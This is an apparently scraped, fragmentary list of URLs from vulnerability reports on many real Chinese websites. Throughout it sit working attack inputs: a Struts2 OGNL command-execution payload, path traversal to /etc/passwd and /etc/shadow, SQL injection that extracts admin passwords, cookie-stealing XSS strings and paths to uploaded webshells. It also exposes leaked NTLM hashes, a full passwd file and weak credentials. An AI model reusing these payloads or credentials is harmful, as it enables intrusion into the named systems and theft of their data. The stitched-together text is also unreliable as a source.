http://20years.china-chigo.com/zhigao/zhigao!getProvice.action老友签到这里可以上传任意文件,通过上传JSP,PHP脚本可以获取webshell http://mini.10010.com/system/login.shtml http://www.ztejtw.com.cn//FCKeditor/editor/filemanager/connectors/php/userfiles/icesword%281%29.aspx http://www.111g.com/?ct=news&ac=search http://www.111g.com/?ct=news&ac=search http://www.jinou.cn/queryGame.action?id=75&indexPage=0 http://ec.guanyisoft.com/,采用PHPCMS http://xszz.zjedu.gov.cn http://www.dasi.gov.cn/new/hwcrm/login.php http://219.135.157.142:9000/irpt/oem/grpslogin.jsp http://china.aliued.com/ http://webmail.aliued.com/readme.txt http://webmail.aliued.com/.svn/entries http://www.yjhl.gov.cn/WebRoot/fwageAction!list.action http://www.111g.com/?ct=glogin&game_id=2&server_id=12 http://www.111g.com/?ct=glogin&game_id=2&server_id=12 http://www.hjsd.cn/ www.ubox.cn http://222.56.46.87:8096/ http://www.ztewelink.com.cn/ewebeditor/admin/ http://jiaoyou.58.com/user/follow?uid=10475096157702&d=1383231187246 http://jiaoyou.58.com/photo/ajaxdeletephoto?id=22099841704474 http://www.vmovier.com/wp-content/themes/HotNewspro/share_statistics.php URL:http://121.***.***.122:8090/ http://121.***.***.122:8090//general/vmeet/wbUpload.php?fileName=test.php.111 http://121.***.***.122:15698/ data:text/html,biduwebdata,也就是显示错误信息;由于这个data:协议非常容易伪造,给了这个脚本可乘之机; http://wlan.ct10000.com/portal/dwr/call/plaincall/DwrHandlerClass.send.dwr http://wlan.ct10000.com http://wlan.ct10000.com/portal/dwr/test/DwrHandlerClass http://140.207.194.192:8080/ http://tuchong.com/1/,帐号名:webmaster想必应该是管理员的帐号。 http://xd2.hupu.com/?s=3 http://nslm.hupu.com/?s=13 http://elreport.ce-air.com/elreport/index.jsp http://club.suning.com/admin.php http://www.ftms.com.cn//information/news_detail.php?id=186 http://www.ftms.com.cn/phpMyAdmin/ http://www.ftms.com.cn/phpMyAdmin/ http://www.amtium.com/news_detail.jsp?NewsID=194 http://pk.tom.com:80/ http://220.181.153.53:8080/a http://220.181.153.197/index.do http://www.q5.com/ http://bbs.lusen.com/home.php?mod=space&uid=614766&do=blog&id=4079 http://pda.zto.cn data:text/html;base64,PHNjcmlwdD5hbGVydCgnSFVDLVVOSVN+Qnl+V29veXVuJyk8L3NjcmlwdD4= http://wooyun.org\u0022\u003e\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u002f\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0061\u006c\u0065\u0072\u0074\u0028\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0063\u006f\u006f\u006b\u0069\u0065\u0029\u003e/1.swf http://www.ccpitzj.gov.cn/showlink_E.php?id=23 http://www.ccpitzj.gov.cn/showlink_E.php?id=23 http://www.ccpitzj.gov.cn/admin http://biz.finance.sina.com.cn//meeting/showAllMeeting.php?year=2012 http://biz.finance.sina.com.cn/lc/detail.php?id=47499 http://biz.finance.sina.com.cn/ask/power.php http://xs.zj165.com http://e.zj165.com http://xy.zj165.com http://xy.zj165.com/z1.jsp http://www.ahdongzhi.gov.cn/test.txt http://www.gionee.com/get/product/all?type=88952634&face=88952634&cat=88952634&o=88952634&=%E4%B8%B4%E6%97%B6%E6%8C%89%E9%92%AE http://www.tuinvlang.com/search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319 http://pimg2.gaitu.com/site.rar http://topic.xcar.com.cn/201107/jlys/cszp.php?pic=715871 http://topic.xcar.com.cn/201107/jlys/cszp.php?pic=715871 http://product.digi.163.com/digi/view!brand.action?&count=2574&parentid=00DG0JaD0PYU0PYZ&p=12 http://mo.vancl.com/mobileapp/mobile/system/loginAction!queryAuthCode.do http://www.jukuu.com/dormd.php?id=107322273999999 http://www.jukuu.com/dormd.php?id=107322273999999 http://wap.sina.com.cn/ http://wap.sina.com.cn/ http://exchange.lorealparis.com.cn/存在后台弱口令,后台地址:http://exchange.lorealparis.com.cn/admin_login/index.aspx后台里面有几百条会员相关数据信息 http://lib.hnswdx.gov.cn/news.asp?bigid=800&smallid=8001 http://www.pigai.org/ http://tanchun.pigai.org/index.php?c=v2&a=view&eid=1386435 http://ideaclub.lenovo.com.cn/club/index.php?m=goods&c=lists http://sms.haiercrm.com/smssend/login.jsp http://expert.womai.com/ http://sebug.net/vuldb/ssvid-20811 http://www.zcsfda.gov.cn/info_Print.asp?ArticleID=377 http://115.182.51.140/html/encoder/index.html http://115.182.51.141/html/encoder/index.html http://bgy.ata.net.cn/CUST01hgkw/Login.aspx http://xss.tw/**** http://www.111g.com/?ct=servers&game_id=11 http://www.111g.com/?ct=servers&game_id=11 http://partner.kingdee.com/user/login.action http://beian.cndns.com/ http://115.182.51.129/html/encoder/index.html http://115.182.51.131/html/encoder/index.html http://115.182.51.133/html/encoder/index.html http://115.182.51.137/html/encoder/index.html http://115.182.51.135/ http://reg.163.com/reg/mobile/success.do?product=newsclient&isMob=1&account=%E6%82%A8%E8%8E%B7%E5%BE%97%E4%BA%86www.wooyun.org%E9%80%81%E5%87%BA%E7%9A%84%E4%B8%80%E7%99%BE%E4%B8%87QB%EF%BC%8C%E8%AF%A6%E6%83%85%E8%AE%BF%E9%97%AE%EF%BC%9Awooyun.org,%E8%81%94%E7%B3%BBxsser%E9%A2%86%E5%8F%96 http://q.10010js.com/service/qbi/tcpqq.do?code=验证码&randomcode=验证码&q_account=江苏联通号码&q_number=QQ号码&q_count=QB数量 http://q.10010js.com/service/qbi/tcpqq.do?code=595760&randomcode=595760&q_account=18602577777&q_number=123456&q_count=20 http://www.baomi.org/ http://www.baomi.org/bbs.rar android:name=".providers.YouNiProvider android:process="com.snda.youni.mms android:authorities="com.snda.youni.providers.DataStructs android:name=".providers.ArchiveProvider android:process="com.snda.youni.mms android:authorities="com.snda.youni.providers.ArchiveDataStructs android:name="com.snda.youni.providers.UnreadcountProvider android:process="com.snda.youni.mms android:authorities="com.snda.youni.providers.UnreadcountProvider http://avata.sdo.com/config/config_ucenter.php.bak http://www.cnan.gov.cn/pi.php http://www.cnan.gov.cn/interface/city.php?_f=json&c=0 http://www.gxxnw.gov.cn/hack.asp ftp://172.22.96.9/ ftp://10.36.6.34/ http://172.22.114.10/ http://192.168.11.122/gx_weather/monitor/monitor.action http://10.158.20.10/index.aspx http://support.yeyou.sdo.com/config/config_ucenter.php.bak http://www.zte-e.com/manage/AdminLogin.aspx http://bsm.wandafilm.com/ http://bsm.wandafilm.com/affair/download.jsp?enclosurePath=C%3A%5Ctomcat_bsmitil%5Cwebapps%5CROOT%5C%5Crecordfile%5C222266_20131030_%E9%99%A2%E7%BA%BF_%E5%85%B6%E4%BB%96%5C22.jsp&filename=22.jsp http://bsm.wandafilm.com/affair/download.jsp?enclosurePath=C:\tomcat_bsmitil\webapps\ROOT\\recordfile\222266_20131030_院线_其他\22.jsp&filename=22.jsp http://bsm.wandafilm.com/recordfile/222266_20131030_%E9%99%A2%E7%BA%BF_%E5%85%B6%E4%BB%96/22.jsp,连接菜刀,ok搞定 http://www.ztekj.com/data/hypersonic/localDB.script http://www.ztekj.com/work/jboss.web/www.ztekj.com/ http://sqdj.gov.cn/baidunews/wKkE/index.html http://www.zgsuixian.gov.cn/a/zhengwuhudong/20130911/21928.html http://www.fangxian.gov.cn/html/xwzx/szyw/2013-04/1598.html http://www.tyxjyj.gov.cn/lwz/gxxwz/29259/index.asp http://www.crfebgz.com.cn/admin/ http://www.crfebgz.com.cn/Upfile/20131031105359.asp;.jpg http://219.232.246.252:8000/ http://topic.xcar.com.cn/201109/jrgz/?tjid=1542908 http://topic.xcar.com.cn/201109/jrgz/?tjid=1542908 http://party.vmovier.com/wp-login.php javascript:location.href='xxx http://www.abp.gov.cn/plann/web_descript.action?paramsId=20 http://www.xmyg.gov.cn/index.action http://xm.zjkjt.gov.cn/redirect.action http://www.wh-price.gov.cn/cms/frontpage/price_monitor/PriceTypeList.action?type=1 http://www.12371.rzdj.gov.cn/index-pic.action?part=dqld http://lpa.nmfda.gov.cn/eduOnline/novalidateAction/queryIndexqueryByid.action?tblinfo.tblid=3062 http://www.informatization.gov.cn/cateinfo.action?info_id=628 http://www.lntl.hrss.gov.cn/page/qtnews/zcfgneirong.action?info.id=3221 http://live.fshealth.gov.cn/smjkfw/wsyygh/toresourcepage.action http://pcab.nlc.gov.cn/xwdt/viewNews.action?id=33657 http://www.tzyonganzhou.gov.cn/gaikuangshow.action?id=2 http://60.30.66.195:9080/ldrk/login.do http://www.cnvc.org.cn http://mms.wo.com.cn/DownLoadFile?filePath=/../../../etc/passwd http://mms.wo.com.cn/DownLoadFile?filePath=/../../../etc/shadow http://appserver.lenovo.com.cn/Lenovo_Search.aspx?flag=1&rackcode=A21B07C06&searchBeginValue=0&searchEndValue=5000 http://cifj.trs.com.cn/login.jsp http://cifj.trs.com.cn/login.jsp http://218.207.67.218 http://3g.km169.net http://3g.km169.net/database/ http://eshop.shenzhenair.com/szair/mc/login.jsp http://www.hbstars.com//news/visitcount.aspx?ID=1 http://www.hbstars.com:80/news/visitread.aspx?ID=1 http://sqlmap.org http://m.m.58.com/reg/?from=index_reg http://www.huangling.gov.cn/article_view.php?id=7189存在注入漏洞注入之 http://www.huangling.gov.cn http://hlwhg.huangling.gov.cn/include/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php http://hlwhg.huangling.gov.cn/include/help.php web_huangling:WEB:7C790716BD252CEAAAD3B435B51404EE:F44823C445FB28BE74F1F39392FC WORKGROUP:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C web_other:WEB:7C790716BD252CEAAAD3B435B51404EE:F44823C445FB28BE74F1F39392FCC910 hlsb:WEB:F2BE0A13F1EE3BB4C187B8085FE1D9DF:EB74617A20DF0C89A3EAA14A536EAC7D Administrator:WEB:E280FA1F3A7179C509752A3293831D17:A130FDC91288F65B7D617DDB9314 xiawaftp:WEB:7C790716BD252CEAAAD3B435B51404EE:F44823C445FB28BE74F1F39392FCC910 xiuper:WEB:B15BCD16468DF7B51867D125921CFDFC:385A43C3BB08F8D78817BF371F25F593 http://cw-info.shenzhenair.com/sett/ http://202.106.212.183:8080/iptvstat/Login.action http://123.15.54.36:8888/u-dsm/login.do http://czj.hcq.gov.cn/hcczcgweb/admin/notice.asp?Action=view&ID=489 http://czj.hcq.gov.cn/news_detail.asp?id=565 http://czj.hcq.gov.cn/hcczcgweb/admin/notice.asp?Action=view&ID=401 http://czj.hcq.gov.cn/hcczcgweb/admin/notice.asp?Action=view&ID=350 http://czj.hcq.gov.cn/hcczcgweb/admin/notice.asp?Action=view&ID=344 http://dg.soufun.com/market/lawyer/MLogin.asp http://1626.tudou.com/ http://news.1626.com/ http://cms.icafe8.com/ http://papers.cnki.net/liuyan19880716该用户粉丝8个,其中李阳关注了他 http://bj.soufun.com/market/zbsystem/ http://muscle.tudou.com/muscle/user/index http://calpis.tudou.com/calpis/user/index http://180.166.109.162/register.action http://blog.douguo.com//wp-includes/js/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28/xss/%29}}// http://ask.m.yiche.com/Detail/3575179/ http://www.grn-group.com/index.php/web_email/save http://www.to-wallstreet.com/system/login.do http://112.124.3.235:88/zte/index!index.action中兴新思办学运营系统 http://www.subaru.cn/racing.asp?id=114+and+1=2+union+select+1,name,password+from+admin http://1.com\u0022\u003e\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u002f\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029\u003e/1.swf http://www.cmatc.cma.gov.cn/www/res/index/index.shtml http://210.77.176.44/ http://www.airpp.cn/ppbid/sys/loginAction!initLoginXY.action http://113.108.100.136/jobmaster/information/showpage.do http://www.czsie.com.cn/ http://edu6.teacher.com.cn/tln023a/readme.txt http://www.hdshangbiao.com/ http://news.gbicom.cn http://114.80.121.81/login.action http://114.80.121.81/login.action http://114.80.121.81/1.txt site:zhubajie.com inurl:xls http://id5any.id5.cn:8888/login/login!validateUser.action http://id5any.id5.cn:8888/test.txt http://www.ciprun.com/ http://www.ciprun.com//admin/privilege.php?act=login http://www.csbidding.com/nhzb/ http://data.futures.hexun.com/dpic/drawcccj.ashx?sType=2&sBreed=10301010000&sContract=A1405&sDate=2013-11-01&sRank=20 http://data.stock.hexun.com/include/AjaxSearch2011.ashx?type=stock&key= http://gs.cswa.com/Login.aspx http://gs.cswa.com/default.aspx进入系统 http://gs.cswa.com/tddetail.aspx?file_id=54600可遍历ID访问。 http://gs.cswa.com/LXDetail.aspx?file_id=341 http://ebast.zte.com.cn/filesrepository/ http://ebast.zte.com.cn/filesrepository/112233/TI2G/HOT11223344-2011-04-TI2G-0023/112233-BAUT-170720111842.htm https://210.21.223.37/eAgent/Application/ http://218.65.5.218/ctstyzt/test/,九江职业技术学院船体识图与制图在线测试系统,数据库文件为/Manager/database/TestOnlineDB.asa由于是asa文件,所以我们直接在留言处插一句话,然后连接数据库就直接拿shell了 http://www.steel-mall.com//invoker/JMXInvokerServlet http://edos.heinz.com.cn http://edos.heinz.com.cn/jmx-console/ http://219.135.147.234:9080/astat/auth/login.action http://219.135.147.234:9080/astat/Silic.jsp http://shop.heinz.com.cn/test.php http://edos.heinz.com.cn/jmx-console/ http://edos.heinz.com.cn/OnDemand/loginAction.action http://www.jukuu.com/doreport.php?id=123456789d http://211.139.95.67:8080/login.action http://211.139.95.67:8080/Silic.jsp http://27.22.85.224:8066/cms/frontpage/pubinfo/PubinfoDetail.action http://222.187.113.99/xzxxgk/nrglIndex.action http://issbbs.shunwang.com http://issbbs.shunwang.com/robots.txt/1.php http://issbbs.shunwang.com/attachments/month_1310/131029104380eb5b80a4940c03.png/1.php http://cga.dlgjz.gov.cn:7002/console/login/LoginForm.jsp http://wap.lenovo.com.cn/web2/html/login.html http://www.jyjtys.com/zgAdmin/login.asp http://www.axwater.gov.cn/zgadmin/login.asp http://www.mnfzjz.com/zgadmin/login.asp http://www.jinbukeji.com/zgadmin/login.asp http://www.rszxwsy.com/zgadmin/login.asp http://www.gasnyj.com/zgadmin/login.asp url:http://my.xizi.com/index.php?r=user/profile&uid=1973033 http://my.xizi.com/index.php?r=user/profile&uid=1973033”发给版主 http://meizhi.cn/Channel/image/aid/322/id/1425跳到这里 http://meizhi.cn/UserPlace/mypic/uid/100297 http://kagome.tudou.com/kagome/user/index http://218.94.38.236/meeting/app/meetinglist/todayDataList.action?site=box&portalLocale=&menuname=24000_24001_24002 http://218.94.38.236/download/ http://ued.aili.com http://ued.aili.com/?author=1 http://ued.aili.com/?author=20 http://ued.aili.com/wp-login.php http://www.tudu.im http://www.tudu.im/suggest/ www.17k.com上,点开任意一个小说页面 http://blog.nd.com.cn/ http://blog.nd.com.cn/wp-login.php http://cp.corp.56.com http://cp.corp.56.com/wp-login.php http://mango.jinti.com/ShowPrizeList.aspx?PrizeTypeID=0 http://archives.hainan.gov.cn/1.zip http://lib.zjdx.gov.cn/1.rar http://www.tcom.gov.cn/web.rar http://www.tcom.gov.cn/web.zip http://www.zzkjw.gov.cn/zzkjw.gov.cn.rar http://222.168.22.245 http://www.lzrta.cn/admin/ http://www.lzrta.cn//upfiles/image/shell.asp/z/20131103210220.jpg http://219.239.44.183/ http://219.239.44.63/main/frame.asp?language=Chinese&site_id=MjA4&service_type=MA==# http://219.239.44.26/UDS/Views/Home/Index.aspx http://219.239.44.136/logon,一个让人不明觉厉的系统 http://zgqxb.cma.gov.cn:81/userAction_login.action;jsessionid=FFB98AF80AF616FACD066766862B4AA1 http://www.crsp.org.cn/,扫描后直接爆出一个BBS的RAR,估计是备份所致,然后打开后,后台的各种数据,SQL数据,都历历在目! http://www.crsp.org.cn/bbs.rar,下载出来一看,全站的东西,都在,包括admin的登录信息,和很多重要的其它资料,(包括dede的一些信息,)然后浏览了下数据库信息,见漏洞证明图片! http://cs.jinti.com/ListAllClass.aspx?classids=3,2,8 http://124.227.192.123:8088/www.zip http://www.diyicai.com/.bash_history http://wooyun.org/bugs/wooyun-2013-037625 http://minisite.youku.com/newproduct/event/apple912/getfile.php?file=/var/www/html/youkubj-pms/user/admin_user.php http://minisite.youku.com/youkubj-pms/user/admin_user.php http://www.joyu.com/dangzheng/news_detail.asp?id=793 http://cife.trs.com.cn/login.jsp http://www crfeb03.com/list.php?fid=34加个'发现报错。跑了一下 http://minisite.youku.com/sql07my08admin08/ http://lljiuzhu.mca.gov.cn/web/UserAction.do?method=getLoginInfo http://www.jobui.com/mianshiti/it/java'/ http://promotion.taobao.com/circles/findFriend.do?p=手机号 http://promotion.taobao.com/circles/findFriend.do?p=13505502232 http://vcm.xiaoying.co/feedbackInfo/queryAllFeedbackInfo.do http://www.wandoujia.com/apps/com.quvideo.xiaoying url:http://www.12ipo.com/ http://vip.cswa.com/EpareEmpInfo/ http://vip.cswa.com/EpareEmpInfo/EmpLogi http://iautos.auto.ifeng.com/caidao.php http://t.zhenai.com/common/getComments.do?callback=jQuery18309714489171747118_1383582025205&comment.moduleType=0&comment.specialType=94&pageIndex=1 address:tennis.com.cn/MySqlAdmin/index.php http://www.horise.com/HoriseSite/News/NewsList.aspx?cIndex=1&industry=1 http://mybaby.com.cn/index.php?c=space&a=default&uid=151176 http://comment1.ynet.com/comment.newView.action?csTitleId=62182&toPage=1 http://cp.27.cn:80/?product-picsJson.html&gids=a http://www.jinou.cn/queryGame.action?id=75&indexPage=0 address:www.dm123.cn/pma/index.php address:www.chinamac.com/china/index.php http://119.10.114.245:8080/ http://119.10.114.245:8080/upload/ http://119.10.114.245:8080/upload/error.jsp http://v2.shenzhenair.com/ http://demo.74cms.com/admin http://news.jinku.com/cj/topic_function.php?action=pollIns&ins=toplinlist&flages=90%20flages=90 http://bbs.ccidnet.com/admin.php http://www.v5shop.com.cn/ http://www.v5shop.com.cn/v5shopadmin/login.php http://www.v5shop.com.cn/uploads/soft/131105/5_1103065101.php http://www.sh17.com/admin/webedit/admin_add.asp http://www.sh17.com/admin/index.asp http://211.144.193.6/ http://www.bailetang.com/products/201145185547.htm http://cmsv53.xywy.com cmsv53.xywy.com/mycontrol/cmsmycontrol/login.php http://cmsv53.xywy.com/mycontrol/fix.php http://bobo.cztv.com/ http://bobo.cztv.com/admin.php http://ideaclub.lenovo.com.cn/club/index.php?c=login&f=verifyUsername&m=member&t=Tue http://ideaclub.lenovo.com.cn/club/index.php?c=login&f=verifyUsername&m=member&t=Tue http://trip.cmbchina.com/ http://trip.cmbchina.com/mgm/mgm/rankview_getRuleInfo.action?redirect:${%23s%3dnew%20java.util.ArrayList%28%29,%23x%3dnew%20java.lang.String%28%22cat%22%29,%23xx%3dnew%20java.lang.String%28%22/etc/passwd%22%29,%23s.add%28%23x%29,%23s.add%28%23xx%29,%23a%3dnew%20java.lang.ProcessBuilder%28%23s%29.start%28%29.getInputStream%28%29,%23b%3dnew%20java.io.InputStreamReader%28%23a%29,%23c%3dnew%20java.io.BufferedReader%28%23b%29,%23d%3dnew%20char[51020],%23c.read%28%23d%29,%23test%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29.getWriter%28%29,%23test.println%28%23d%29,%23test.close%28%29 http://city2010.house.sina.com.cn/vote.php?jsonp=?&callback=?&gid= http://city2010.house.sina.com.cn/52shanghai/comment.php?fid=6&sign=10000170&city= https://dynamic.12306.cn/otsweb/sysuser/userCenterAction.do?method=initForChangePwd) http://bbs.ccidnet.com/admin.php http://blog.ccidnet.com/admin.php http://bbs.uc.cn http://bbs.uc.cn/config/config_global.php.bak http://bbs.uc.cn/uc_server/data/config.inc.php.bak http://help.vancl.com/Content/780.html http://222.247.56.29/index.php?app=activity&function=show&id=1&sign_key=a0471ceae9553bab758819e7a84c47f2&cid=1 com:6060 http://appcenter.oa.vipshop.com:6060 http://120.31.133.202/ http://61.142.208.206:8081/ http://www.bchedu.net/Article_Print.asp?ArticleID=834 http://pay.uctest2.ucweb.com:8039/role.jsp http://www.bokesoft.com/ http://www.thinkphp.cn/topic/delete/id/123456.html[/img http://www.thinkphp.cn/extend/482.html http://live.yy.com/index.php?m=Live&type=beauty http://live.yy.com/index.php?m=Activity&do=queryAidsByUser&from=act http://400.xdf.cn/ http://115.182.21.15/ http://www.wkzol.com/www.wkzol.com.rar www.meizhi.cn/UserCenter/image/aid/442 www.meizhi.cn/UserCenter/image?aid=442 http://www.legendcapital.com.cn/Admin/fckeditor/editor/filemanager/connectors/test.html http://www.legendcapital.com.cn/uploadfile/image/ok.asp/111555469.jpg http://www.legendcapital.com.cn/legendcapital.rar http://www.dltour.gov.cn/ http://124.93.228.111:8080/ bt:/pentest/database/sqlmap# http://www.meizhi.cn/Index/showIndustry http://www.hljxm.gov.cn:8002/new/UserFiles/Image/2.jsp http://xxgk.zzszq.gov.cn/www/view/gkzzbak.jsp http://xzfw.wuhai.gov.cn/board/bbs_lista.jsp http://xzfw.xjbz.gov.cn/upimg%5Cinfo%5Ckillbase.jsp http://www.asepb.gov.cn/asep/findGuest http://mail.jsrd.gov.cn:8080/admin/ http://www.nxdw.gov.cn/admin/ http://115.182.21.32/ http://www.jjyyw.gov.cn/admin/login.php bt:/pentest/database/sqlmap# http://www.decfc.dongfang.com/media/media_List.php?NID=1&Language=GB http://gzlps.gov.cn/admin/ http://mail.xys.gov.cn:8080/admin/ http://219.134.88.6/login.aspx http://licaike.hexun.com/List.action licaike.hexun.com/List.action http://m.tom.com/ http://m.tom.com:80/ http://gks.mwr.gov.cn/login.jsp admin:admin http://rsks.mwr.gov.cn/zcxxfw/xxfw/portal/yhzc!login.do http://ptts.iflytek.com/ver.asp http://join.iflytek.com/1.txt http://wooyun.org/bugs/wooyun-2010-034397 file:///c:/fuzz/alert_1.html http://www.oppo.com/?q=interface/getfaq&tag=%25E7%2594%25B5%25E6%25BA%2590%25E7%25B1%25BB http://www.oppo.com/?q=interface/getfaq&tag=%25E7%2594%25B5%25E6%25BA%2590%25E7%25B1%25BB http://ny.py.gov.cn/Portals/290/登录网址及用户名密码2012.xls http://123.232.0.241:7001/aims/jsp/public/login.jsp http://view.gdcct.gov.cn:3690/wcm/infoview.do?serviceid=wcm6_user&MethodName=getUsersByNames&UserNames=admin http://view.gdcct.gov.cn:3690/wcm/WCMV6/main.jsp http://www.jingmen.gov.cn/ftp/install.php http://cg.ifeng.com http://cg.ifeng.com:80/ http://my.51job.com/51club/coupon/trace.php?tag=wzhan_web_iphone_242_appstore&u=aHR0cHM6Ly9pdHVuZXMuYXBwbGUuY29tL2NuL2FwcC9pZDQxNTQ0MzY0ND9tdD04 https://itunes.apple.com/cn/app/id415443644?mt=8 http://www.crfeb5.com.cn/admin/index.php http://www.wanyan.com/vote/vote!toSingleVote.dhtml http://product.dangdang.com/23344491.html http://www.51point.com/51point2/survey/survey-new!init.action http://202.96.27.18/index.php http://www.bztdxxl.com/qysd/albums.php?sort_id=12 http://114.242.152.122:8080/ http://114.242.152.122/scada/resource/public/handler/jl2.jsp http://bbs.mumayi.com http://bbs.mumayi.com/config/config_global.php.bak http://bbs.mumayi.com/{domain_name}phpmyadmin/ http://www.foxitsoftware.cn/ http://edu.cztv.com/elearning/project/front/getFreeProject.action http://edu.cztv.com/elearning/1.txt http://passport.189.cn/i/ http://tclcom.tcl.com/ http://tclcom.tcl.com/admin http://tclcom.tcl.com/admin/documents/upload/ http://order.qy.tom.com:8080/index.html http://order.qy.tom.com:8080/phpinfo.php http://f.game.tom.com/yxdt/2013/532/index.php http://jc.gdsx.gov.cn/website/supervise/superviseSiteAction.action http://bbs.pigai.org/t84469-1-1.html http://mail.zto.cn/register.php http://www.sxxwcb.gov.cn/sxxwcbadmin/index.php http://www.sxxwcb.gov.cn/404.php http://www.189store.com/index.php?app=myapp&act=collection&type=app&uid=207643763 http://member.chinaacc.com/common/selectphoneForwww.shtm?name= http://www.91zhuji.cn/ http://www.91zhuji.cn/page/products/?'9.html http://z.yy.com/zone/message.do http://www.cd-procurement.gov.cn/zfcgsite/Secondary/BulletinInfo.aspx?nav_id=01010000&id=-44 http://115.182.51.234:8080/ root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin saslauth:x:499:76:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin avahi:x:70:70:Avahi Stack:/var/run/avahi-daemon:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin puppet:x:500:500::/etc/puppet/:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin lele:x:0:0:lele:/home/lele:/bin/bash zabbix:x:502:502:zabbix:/usr/local/zabbix:/bin/bash wiky:x:503:503::/letv/wiky:/bin/bash hadoop:x:504:504::/home/hadoop:/bin/bash jenkins:x:498:498:Jenkins server:/var/lib/jenkins:/bin/false http://gz.ip66.com/ http://www.dhqn.gov.cn/admin/index.asp http://www.dhqn.gov.cn/admin/jc_editor/Flash.html http://www.dhdj.com.cn/manage/TC_User/TC_User_add.aspx http://124.126.42.8/ http://dd.gzuni.com/login.action IP:192.168.0.124 port:1521 http://115.85.254.196/FCKeditor/editor/filemanager/upload/test.html http://115.85.254.196/UserFiles/1.asp;1.gif http://iwatchome.tom.com/ http://nokia-imaging.tom.com.cn http://nokia-imaging.tom.com.cn/knowledge_view.jsp?type=2 http://kernel-c.maxthon.cn/www/init.php http://build.maxthon.com/ http://partner.maxthon.com/login.action http://partner.maxthon.com/help.jsp http://qiaodan.tom.com http://qiaodan.tom.com/index.php/activity/uploadpage http://bd.generali-china.cn/jmx-console/ http://km.ip66.com/ http://km.ip66.com/3gs.php?id=3 root:0d6a23d72da9fac9 bt:/pentest/database/sqlmap# http://www.foxitsoftware.cn/cms/index.php?ac=login http://bbs.lvmama.com http://bbs.lvmama.com/config/config_global.php.bak http://home.ithaier.com/Tech/chgpwd.asp http://prepaidcard.yeepay.com/kyp/queryMobileTopupResult.action?redirect http://www.crec.com.cn/read.asp?id=1594 http://www.crec.com.cn/news/list.asp?unid=1178 http://www.masrcb.com/masrcb.rar www.hl-n-tax.gov.cn http://www.cscl.com.cn/address.asp?id=31 http://119.254.72.250/ http://119.254.72.250/download/attachment/W5mbj-WGLv5gWZzNSb-W/ http://119.254.72.250/download/attachment/W5mbj-WGLv5gWZzNSb-W/WlAWGe-Wbq-W/S5004792.JPG http://www.lndca.gov.cn/plugins/1/AspxSpy.aspx http://www.lndca.gov.cn/plugins/ cs.beta.ulechina.tom.com/csadmin/csadminFilterurls/query_req.do http://www.tomgroup.com/sql/ http://nokia-imaging.tom.com.cn/manage/index.jsp http://www.tophr.net/news/newslist.asp?id=23%20and%201=1 http://www.tophr.net/news/newslist.asp?id=23%20and%201=2 http://www.lc.gov.cn/web.rar http://www.19lou.com/forum-464781-thread-10241383887082785-1-1.html http://haodian.19lou.com/searchshoplist/0/1/1/1/dfdf%22onmouseover=%22alert%28document.cookie%29/1/1 http://www.jlsfj.gov.cn/ http://game.jinti.com/gameserverlist http://store.kingdee.com/bbs/forum.php?mod=forumdisplay&fid=2&tag_set_id=187&tag_id=1002 http://store.kingdee.com/bbs/forum.php?mod=forumdisplay&fid=2&tag_set_id=187&tag_id=1002 http://store.kingdee.com/bbs/forum.php?mod=forumdisplay&fid=2&tag_set_id=187&tag_id=1002 http://www.grad-bac.cn/news.php?id=665 http://www.wxrkw.gov.cn/ http://ics.365car.com.cn/server-status http://ics.365car.com.cn/WEB-INF/web.xml http://211.151.55.40/web4s/indexAction/index_returnIdexPage.action http://it.homeinns.com/homeinnsupload/CompanyCard/CardView.aspx http://gx.lss.gov.cn/ps-cms/counter/new_addArticleClicked.jsp?item_id=14334 http://125.88.6.173/main/UserManager-esmsLogin.action http://125.88.6.173/voluntary/voluntaryReportQuery.action app.m.letv.com/android/inde http://www.guoku.com/entity/note/update/299094/ http://p.zj189.cn/pepsi/web/index.jsp http://p.zj189.cn/pepsi/web/info2.jsp?coupon=2&PrizeID=兑换码 